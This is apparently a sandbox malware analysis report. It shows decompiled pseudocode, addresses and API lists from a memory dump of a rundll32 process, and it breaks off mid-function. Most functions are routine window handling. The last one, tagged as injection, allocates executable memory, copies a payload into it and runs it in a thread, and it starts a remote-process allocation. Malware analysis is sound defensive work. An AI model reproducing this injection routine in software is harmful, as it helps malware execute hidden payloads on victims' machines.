						 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
						_t355 = _v8;
						__eflags =  *((char*)(_t355 + 0x57));
						if( *((char*)(_t355 + 0x57)) != 0) {
							E02817918(_v8, _t395, _t417);
						}
					}
					L64:
					 *((char*)(_v8 + 0x230)) = 0;
					if( *((char*)(_v8 + 0x22f)) != 1) {
						ShowWindow(E02833F7C(_v8),  *(0x2863d00 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
					} else {
						if( *(_v8 + 0x22b) != 2) {
							ShowWindow(E02833F7C(_v8),  *(0x2863d00 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
							_t272 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
							__eflags = _t272;
							CallWindowProcA(0x27d6a34, E02833F7C(_v8), 5, 0, _t272);
							E0282D9B0();
						} else {
							_t283 = E02833F7C(_v8);
							_t284 =  *0x2865b58; // 0x41d1544
							_t145 = _t284 + 0x44; // 0x0
							SendMessageA( *( *_t145 + 0x254), 0x223, _t283, 0);
							ShowWindow(E02833F7C(_v8), 3);
						}
						_t278 =  *0x2865b58; // 0x41d1544
						_t159 = _t278 + 0x44; // 0x0
						SendMessageA( *( *_t159 + 0x254), 0x234, 0, 0);
					}
					goto L83;
				}
			}












































































                          0x02819bd9
                          0x02819bdb
                          0x02819be3
                          0x02819be6
                          0x02819be9
                          0x02819bee
                          0x02819bef
                          0x02819bf4
                          0x02819bf7
                          0x02819c01
                          0x02819c12
                          0x02819c17
                          0x02819c26
                          0x02819c2b
                          0x02819c2b
                          0x02819c30
                          0x02819c35
                          0x02819c3d
                          0x02819c46
                          0x02819c47
                          0x02819c4c
                          0x02819c4f
                          0x02819c59
                          0x0281a16f
                          0x0281a171
                          0x0281a174
                          0x0281a177
                          0x0281a17c
                          0x0281a17f
                          0x0281a186
                          0x0281a186
                          0x02819c5f
                          0x02819c62
                          0x02819c69
                          0x0281a063
                          0x0281a064
                          0x0281a069
                          0x0281a06c
                          0x0281a076
                          0x0281a07d
                          0x0281a080
                          0x0281a09c
                          0x0281a0a1
                          0x0281a0a4
                          0x0281a0a7
                          0x0281a0a9
                          0x0281a0ae
                          0x0281a0ae
                          0x0281a0b3
                          0x0281a0b6
                          0x0281a0bd
                          0x0281a0cc
                          0x0281a0cf
                          0x0281a0d6
                          0x0281a0f9
                          0x0281a0ff
                          0x0281a106
                          0x0281a10b
                          0x0281a10d
                          0x0281a118
                          0x0281a11d
                          0x0281a11f
                          0x0281a12e
                          0x0281a12e
                          0x0281a11f
                          0x0281a131
                          0x0281a135
                          0x0281a16a
                          0x0281a137
                          0x0281a14f
                          0x0281a158
                          0x0281a158
                          0x0281a0d8
                          0x0281a0f0
                          0x0281a0f0
                          0x0281a0bf
                          0x0281a0c2
                          0x0281a0c2
                          0x00000000
                          0x0281a0bd
                          0x02819c71
                          0x02819c72
                          0x02819c77
                          0x02819c7a
                          0x02819c84
                          0x02819c8b
                          0x02819c8e
                          0x02819cb4
                          0x02819ce0
                          0x02819d1e
                          0x02819d2b
                          0x02819d2b
                          0x02819d2e
                          0x02819d30
                          0x02819d32
                          0x02819d32
                          0x02819d35
                          0x02819d38
                          0x02819d45
                          0x02819d45
                          0x02819d48
                          0x02819d4a
                          0x02819d4c
                          0x02819d4c
                          0x02819d4f
                          0x00000000
                          0x02819ce2
                          0x02819ce2
                          0x02819ce7
                          0x02819cf2
                          0x02819cf5
                          0x02819cf7
                          0x02819cf9
                          0x02819cf9
                          0x02819cfc
                          0x02819cff
                          0x02819d04
                          0x02819d0f
                          0x02819d12
                          0x02819d14
                          0x02819d16
                          0x02819d16
                          0x02819d19
                          0x02819d52
                          0x02819d56
                          0x02819d5a
                          0x02819d5a
                          0x02819d61
                          0x02819d65
                          0x02819d65
                          0x02819d76
                          0x02819d79
                          0x02819d81
                          0x02819d8e
                          0x02819d97
                          0x02819d97
                          0x00000000
                          0x02819d8e
                          0x02819da1
                          0x02819da1
                          0x02819dac
                          0x02819dae
                          0x02819eac
                          0x02819eaf
                          0x02819eb6
                          0x02819ebc
                          0x02819ebf
                          0x02819ec6
                          0x02819f04
                          0x02819f11
                          0x02819f11
                          0x02819f14
                          0x02819f16
                          0x02819f18
                          0x02819f18
                          0x02819f1b
                          0x02819f1e
                          0x02819f2b
                          0x02819f2b
                          0x02819f2e
                          0x02819f30
                          0x02819f32
                          0x02819f32
                          0x02819f35
                          0x02819ec8
                          0x02819ec8
                          0x02819ecd
                          0x02819ed8
                          0x02819ed8
                          0x02819edb
                          0x02819edd
                          0x02819edf
                          0x02819edf
                          0x02819ee2
                          0x02819ee5
                          0x02819eea
                          0x02819ef5
                          0x02819ef5
                          0x02819ef8
                          0x02819efa
                          0x02819efc
                          0x02819efc
                          0x02819eff
                          0x02819eff
                          0x02819f38
                          0x02819f3c
                          0x02819f3e
                          0x02819f40
                          0x02819f40
                          0x02819f43
                          0x02819f47
                          0x02819f49
                          0x02819f4b
                          0x02819f4b
                          0x02819f67
                          0x02819f67
                          0x02819db4
                          0x02819db4
                          0x02819db9
                          0x02819dbc
                          0x02819dbf
                          0x02819dc2
                          0x02819dc9
                          0x02819dd1
                          0x02819dd7
                          0x02819ddc
                          0x02819dde
                          0x02819de6
                          0x02819de6
                          0x02819dde
                          0x02819de9
                          0x02819ded
                          0x02819e29
                          0x02819e36
                          0x02819e36
                          0x02819e39
                          0x02819e3b
                          0x02819e3d
                          0x02819e3d
                          0x02819e40
                          0x02819e43
                          0x02819e50
                          0x02819e50
                          0x02819e53
                          0x02819e55
                          0x02819e57
                          0x02819e57
                          0x02819e5a
                          0x02819def
                          0x02819df8
                          0x02819df8
                          0x02819dfb
                          0x02819dfd
                          0x02819dff
                          0x02819dff
                          0x02819e08
                          0x02819e14
                          0x02819e14
                          0x02819e17
                          0x02819e19
                          0x02819e1b
                          0x02819e1b
                          0x02819e24
                          0x02819e24
                          0x02819e5d
                          0x02819e61
                          0x02819e63
                          0x02819e65
                          0x02819e65
                          0x02819e68
                          0x02819e6c
                          0x02819e6e
                          0x02819e70
                          0x02819e70
                          0x02819e81
                          0x02819e84
                          0x02819e8c
                          0x02819e92
                          0x02819e95
                          0x02819e99
                          0x02819ea2
                          0x02819ea2
                          0x02819e99
                          0x02819f6d
                          0x02819f70
                          0x02819f81
                          0x0281a057
                          0x02819f87
                          0x02819f91
                          0x02819fe4
                          0x02819ff8
                          0x02819ff8
                          0x0281a00d
                          0x0281a015
                          0x02819f93
                          0x02819f98
                          0x02819fa3
                          0x02819fa8
                          0x02819fb2
                          0x02819fc2
                          0x02819fc2
                          0x0281a023
                          0x0281a028
                          0x0281a032
                          0x0281a032
                          0x00000000
                          0x02819f81

                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: LoadString
                          • String ID:
                          • API String ID: 2948472770-0
                          • Opcode ID: da732fb6e2dc862afd31522ab96a398caa19574a3fee5730b99d4a7e7e430eb2
                          • Instruction ID: 409cb5ab0cf99f28b78b442e04e324da162edf86ecc9dbf920fd54f6a588b23f
                          • Opcode Fuzzy Hash: da732fb6e2dc862afd31522ab96a398caa19574a3fee5730b99d4a7e7e430eb2
                          • Instruction Fuzzy Hash: 1E02F97CA10249EFDB01DFA8DA98B9DBBF9AB08304F6444A4E504EB291D775EE40DF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02834260 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E02834260(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E0282CD7C(_t43);
			}










                          0x02834263
                          0x02834266
                          0x02834276
                          0x028342a5
                          0x02834278
                          0x02834278
                          0x0283428c
                          0x02834297
                          0x02834298
                          0x02834299
                          0x0283429a
                          0x0283429a
                          0x028342bd
                          0x028342cd
                          0x028342d1
                          0x028342d5
                          0x028342e0
                          0x028342e0
                          0x028342d1
                          0x028342e8
                          0x028342ef
                          0x028342f9
                          0x02834304
                          0x02834314

                          APIs
                          • IsIconic.USER32(?), ref: 0283426F
                          • GetWindowPlacement.USER32(?,0000002C), ref: 0283428C
                          • GetWindowRect.USER32(?), ref: 028342A5
                          • GetWindowLongA.USER32(?,000000F0), ref: 028342B3
                          • GetWindowLongA.USER32(?,000000F8), ref: 028342C8
                          • ScreenToClient.USER32(00000000), ref: 028342D5
                          • ScreenToClient.USER32(00000000,?), ref: 028342E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                          • String ID: ,
                          • API String ID: 2266315723-3772416878
                          • Opcode ID: b5862382137e1a3b3c6836192f3a670612fcd5fe1beae2114fa89947cdf3f193
                          • Instruction ID: b7d0c20d2f434f1715c4562a51ddd0e17f66881195d0f3e8e08505436f016a13
                          • Opcode Fuzzy Hash: b5862382137e1a3b3c6836192f3a670612fcd5fe1beae2114fa89947cdf3f193
                          • Instruction Fuzzy Hash: 10115E75505600AFCB42DFACD888A9B77EDBF49310F044928FD5CDB245DB31E9048BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282748C Relevance: 10.9, APIs: 7, Instructions: 405nativeCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 91%
                          			E0282748C(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				struct HWND__* _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				void* _t252;
				signed int _t258;
				void* _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t285;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed int _t292;
				intOrPtr _t312;
				intOrPtr _t334;
				intOrPtr _t343;
				intOrPtr _t347;
				intOrPtr* _t354;
				signed int _t356;
				intOrPtr* _t357;
				intOrPtr* _t360;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				intOrPtr* _t376;
				void* _t378;
				void* _t379;
				intOrPtr _t380;
				void* _t381;

				_t378 = _t379;
				_t380 = _t379 + 0xffffffd0;
				_v52 = 0;
				_t376 = __edx;
				_v8 = __eax;
				_push(_t378);
				_push(0x28279bf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t380;
				_t137 =  *__edx;
				_t381 = _t137 - 0x111;
				if(_t381 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t272;
						if(_t272 < 0) {
							goto L67;
						} else {
							_t273 = _t272 + 1;
							_t368 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E02826838(E027EB1E0(_v8, _t368),  *(_t376 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t368 = _t368 + 1;
								_t273 = _t273 - 1;
								__eflags = _t273;
								if(_t273 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t275;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x28645d4; // 0x2865b58
								E0281EFF4( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t276 = _t275 + 1;
								_t369 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t376 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t376 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t376 + 4) & 0x0000ffff);
										}
									}
									_t158 = E027EB1E0(_v8, _t369);
									_t296 = _v17;
									_v16 = E0282677C(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t369 = _t369 + 1;
									_t276 = _t276 - 1;
									__eflags = _t276;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E0282A834( *((intOrPtr*)(_v16 + 0x58)), _t296,  &_v52, __eflags);
								_t165 =  *0x28645d4; // 0x2865b58
								E0281EFF4( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t278;
								if(_t278 < 0) {
									goto L67;
								} else {
									_t279 = _t278 + 1;
									_t370 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E027EB1E0(_v8, _t370);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t376 + 8);
										if(_t173 ==  *(_t376 + 8)) {
											break;
										}
										_t177 = E0282677C(_v48, 1,  *(_t376 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t370 = _t370 + 1;
											_t279 = _t279 - 1;
											__eflags = _t279;
											if(_t279 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0282707C(_v48, _t376);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t381 == 0) {
						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t281;
						if(_t281 < 0) {
							goto L67;
						} else {
							_t282 = _t281 + 1;
							_t371 = 0;
							__eflags = 0;
							while(1) {
								E027EB1E0(_v8, _t371);
								_t181 = E0282681C( *(_t376 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t371 = _t371 + 1;
								_t282 = _t282 - 1;
								__eflags = _t282;
								if(_t282 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t284;
							if(_t284 < 0) {
								goto L67;
							} else {
								_t285 = _t284 + 1;
								_t372 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E0282677C(E027EB1E0(_v8, _t372), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t372 = _t372 + 1;
									_t285 = _t285 - 1;
									__eflags = _t285;
									if(_t285 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E027F7E84(0, 1);
								_push(_t378);
								_push(0x28277f2);
								_push( *[fs:eax]);
								 *[fs:eax] = _t380;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t378);
								_push(0x28277d5);
								_push( *[fs:eax]);
								 *[fs:eax] = _t380;
								E027F856C(_v24,  *(_v40 + 0x18));
								E027F83E8(_v24);
								E02827C64(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t334);
								 *[fs:eax] = _t334;
								_push(0x28277dc);
								__eflags = 0;
								E027F856C(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t287;
								if(_t287 < 0) {
									goto L67;
								} else {
									_t288 = _t287 + 1;
									_t373 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E0282677C(E027EB1E0(_v8, _t373), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t373 = _t373 + 1;
										_t288 = _t288 - 1;
										__eflags = _t288;
										if(_t288 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_v32 = GetWindowDC( *(_v8 + 0x10));
									 *[fs:eax] = _t380;
									_v24 = E027F7E84(0, 1);
									 *[fs:eax] = _t380;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t380;
									E027F856C(_v24, _v32);
									E027F83E8(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x28278f3, _t378,  *[fs:eax], 0x2827910, _t378,  *[fs:eax], 0x2827935, _t378);
									_pop(_t343);
									 *[fs:eax] = _t343;
									_push(0x28278fa);
									__eflags = 0;
									E027F856C(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t291;
									if(_t291 < 0) {
										goto L67;
									} else {
										_t292 = _t291 + 1;
										_t374 = 0;
										__eflags = 0;
										while(1) {
											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E027EB1E0(_v8, _t374))) + 0x34))();
											_t347 = _v36;
											__eflags = _t252 -  *((intOrPtr*)(_t347 + 0xc));
											if(_t252 !=  *((intOrPtr*)(_t347 + 0xc))) {
												_v16 = E0282677C(E027EB1E0(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E027EB1E0(_v8, _t374) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t374 = _t374 + 1;
											_t292 = _t292 - 1;
											__eflags = _t292;
											if(_t292 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t258 = E028267AC(E027EB1E0(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t258;
										if(_t258 == 0) {
											_t266 = E027EB1E0(_v8, _t374);
											__eflags = 0;
											_t258 = E028267AC(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t354 =  *0x2864774; // 0x2865b5c
										_t56 =  *_t354 + 0x6c; // 0x0
										_t356 =  *_t56;
										__eflags = _t356;
										if(_t356 != 0) {
											__eflags = _t258;
											if(_t258 == 0) {
												_t258 =  *(_t356 + 0x158);
											}
											__eflags =  *(_t356 + 0x228) & 0x00000008;
											if(( *(_t356 + 0x228) & 0x00000008) == 0) {
												_t357 =  *0x28645d4; // 0x2865b58
												E0281EBC0( *_t357, _t292, _t258);
											} else {
												_t360 =  *0x28645d4; // 0x2865b58
												E0281EC38( *_t360, _t258, 8);
											}
										}
									}
								} else {
									L67:
									_push( *(_t376 + 8));
									_push( *(_t376 + 4));
									_push( *_t376);
									_t144 =  *(_v8 + 0x10);
									_push(_t144);
									L027D6A3C();
									 *(_t376 + 0xc) = _t144;
								}
								L68:
								_pop(_t312);
								 *[fs:eax] = _t312;
								_push(0x28279c6);
								return E027D40E8( &_v52);
							}
						}
					}
				}
				L69:
			}


































































                          0x0282748d
                          0x0282748f
                          0x02827497
                          0x0282749a
                          0x0282749c
                          0x028274a1
                          0x028274a2
                          0x028274a7
                          0x028274aa
                          0x028274ad
                          0x028274af
                          0x028274b4
                          0x028274d6
                          0x028274d6
                          0x028274db
                          0x0282752a
                          0x0282752b
                          0x0282752d
                          0x00000000
                          0x02827533
                          0x02827533
                          0x02827534
                          0x02827534
                          0x02827536
                          0x02827543
                          0x02827548
                          0x0282754a
                          0x00000000
                          0x00000000
                          0x02827550
                          0x02827551
                          0x02827551
                          0x02827552
                          0x00000000
                          0x02827554
                          0x00000000
                          0x02827554
                          0x00000000
                          0x02827552
                          0x02827536
                          0x028274dd
                          0x028274dd
                          0x028274dd
                          0x028274e0
                          0x02827559
                          0x0282755d
                          0x02827561
                          0x02827563
                          0x02827563
                          0x0282756d
                          0x0282756e
                          0x02827570
                          0x028275e6
                          0x028275e6
                          0x028275ef
                          0x00000000
                          0x02827572
                          0x02827572
                          0x02827573
                          0x02827573
                          0x02827575
                          0x02827575
                          0x02827579
                          0x0282759f
                          0x0282757b
                          0x0282757b
                          0x0282757e
                          0x02827580
                          0x02827592
                          0x02827582
                          0x0282758d
                          0x0282758d
                          0x02827580
                          0x028275a7
                          0x028275ac
                          0x028275b7
                          0x028275ba
                          0x028275be
                          0x00000000
                          0x00000000
                          0x028275e2
                          0x028275e3
                          0x028275e3
                          0x028275e4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x028275e4
                          0x028275c9
                          0x028275d1
                          0x028275d8
                          0x028275d8
                          0x028274e2
                          0x028274e2
                          0x028274e3
                          0x0282794c
                          0x0282794d
                          0x0282794f
                          0x00000000
                          0x02827951
                          0x02827951
                          0x02827952
                          0x02827952
                          0x02827954
                          0x0282795e
                          0x02827966
                          0x02827969
                          0x0282796c
                          0x00000000
                          0x00000000
                          0x02827976
                          0x0282797b
                          0x0282797d
                          0x0282798b
                          0x0282798c
                          0x0282798c
                          0x0282798d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0282797d
                          0x02827984
                          0x02827984
                          0x028274e9
                          0x00000000
                          0x028274e9
                          0x028274e3
                          0x028274e0
                          0x00000000
                          0x028274b6
                          0x028274b6
                          0x028274f4
                          0x028274f5
                          0x028274f7
                          0x00000000
                          0x028274fd
                          0x028274fd
                          0x028274fe
                          0x028274fe
                          0x02827500
                          0x02827505
                          0x0282750e
                          0x02827513
                          0x02827515
                          0x00000000
                          0x00000000
                          0x0282751b
                          0x0282751c
                          0x0282751c
                          0x0282751d
                          0x00000000
                          0x0282751f
                          0x00000000
                          0x0282751f
                          0x00000000
                          0x0282751d
                          0x02827500
                          0x00000000
                          0x028274b8
                          0x028274b8
                          0x028274bb
                          0x028276fe
                          0x02827707
                          0x02827708
                          0x0282770a
                          0x00000000
                          0x02827710
                          0x02827710
                          0x02827711
                          0x02827711
                          0x02827713
                          0x0282772a
                          0x0282772d
                          0x02827731
                          0x00000000
                          0x00000000
                          0x028277f9
                          0x028277fa
                          0x028277fa
                          0x028277fb
                          0x00000000
                          0x02827801
                          0x00000000
                          0x02827801
                          0x00000000
                          0x028277fb
                          0x02827743
                          0x02827748
                          0x02827749
                          0x0282774e
                          0x02827751
                          0x02827760
                          0x02827765
                          0x02827766
                          0x0282776b
                          0x0282776e
                          0x0282777a
                          0x0282778f
                          0x028277a8
                          0x028277af
                          0x028277b2
                          0x028277b5
                          0x028277ba
                          0x028277bf
                          0x028277d4
                          0x028277d4
                          0x028274c1
                          0x028274c1
                          0x028274c2
                          0x02827809
                          0x02827812
                          0x02827813
                          0x02827815
                          0x00000000
                          0x0282781b
                          0x0282781b
                          0x0282781c
                          0x0282781c
                          0x0282781e
                          0x02827835
                          0x02827838
                          0x0282783c
                          0x00000000
                          0x00000000
                          0x0282793c
                          0x0282793d
                          0x0282793d
                          0x0282793e
                          0x00000000
                          0x02827944
                          0x00000000
                          0x02827944
                          0x00000000
                          0x0282793e
                          0x0282784e
                          0x0282785c
                          0x0282786b
                          0x02827879
                          0x02827885
                          0x02827893
                          0x0282789c
                          0x028278b1
                          0x028278cb
                          0x028278d0
                          0x028278d3
                          0x028278d6
                          0x028278db
                          0x028278e0
                          0x028278f2
                          0x028278f2
                          0x028274c8
                          0x028274cb
                          0x028275fc
                          0x02827605
                          0x02827606
                          0x02827608
                          0x00000000
                          0x0282760e
                          0x0282760e
                          0x0282760f
                          0x0282760f
                          0x02827611
                          0x0282761d
                          0x02827620
                          0x02827623
                          0x02827626
                          0x02827651
                          0x02827628
                          0x02827635
                          0x02827635
                          0x02827654
                          0x02827658
                          0x00000000
                          0x00000000
                          0x028276ee
                          0x028276ef
                          0x028276ef
                          0x028276f0
                          0x00000000
                          0x028276f6
                          0x00000000
                          0x028276f6
                          0x00000000
                          0x028276f0
                          0x02827670
                          0x02827675
                          0x02827677
                          0x0282767e
                          0x02827689
                          0x0282768b
                          0x0282768b
                          0x02827690
                          0x02827698
                          0x02827698
                          0x0282769b
                          0x0282769d
                          0x028276a3
                          0x028276a5
                          0x028276ac
                          0x028276ac
                          0x028276b8
                          0x028276bf
                          0x028276db
                          0x028276e4
                          0x028276c1
                          0x028276c1
                          0x028276d1
                          0x028276d1
                          0x028276bf
                          0x0282769d
                          0x028274d1
                          0x0282798f
                          0x02827992
                          0x02827996
                          0x02827999
                          0x0282799d
                          0x028279a0
                          0x028279a1
                          0x028279a6
                          0x028279a6
                          0x028279a9
                          0x028279ab
                          0x028279ae
                          0x028279b1
                          0x028279be
                          0x028279be
                          0x028274c2
                          0x028274bb
                          0x028274b6
                          0x00000000

                          APIs
                          • SaveDC.GDI32(?), ref: 0282775B
                          • RestoreDC.GDI32(?,?), ref: 028277CF
                          • GetWindowDC.USER32(?,00000000,028279BF), ref: 02827849
                          • SaveDC.GDI32(?), ref: 02827880
                          • RestoreDC.GDI32(?,?), ref: 028278ED
                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,028279BF), ref: 028279A1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: RestoreSaveWindow$NtdllProc_
                          • String ID:
                          • API String ID: 1346906915-0
                          • Opcode ID: a54e4be7b6e0b856171f02d4727e410607d1cb3e39c5d323b6dccf5cad96f2d9
                          • Instruction ID: d7951693544f32c9712fc4c384f68c576aacbce8ae785175e755c258815c93b0
                          • Opcode Fuzzy Hash: a54e4be7b6e0b856171f02d4727e410607d1cb3e39c5d323b6dccf5cad96f2d9
                          • Instruction Fuzzy Hash: 92E1263CA042199FDB11DFAAC9849AEF7FAFB49304B2186A5E405E7360C734AD85CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D3880 Relevance: 10.6, APIs: 7, Instructions: 103memorythreadinjectionCOMMON
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E042D3880(void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				long _v36;

				if(_a12 == 0) {
					_v8 = VirtualAlloc(0, _a8, 0x3000, 0x40);
					if(_v8 == 0) {
						L14:
						return 0;
					}
					E042D1450(_v8, _a4, _a8);
					if(_a16 == 0) {
						_v28 = _v8;
						_v28();
						return 1;
					}
					_v24 = CreateThread(0, 0, E042D39E0, _v8, 0, 0);
					if(_v24 == 0) {
						goto L14;
					}
					CloseHandle(_v24);
					return 1;
				}
				if(E042D2C40( &_v16,  &_v32) != 0) {
					_v12 = VirtualAllocEx(_v16, 0, _a8, 0x3000, 0x40);
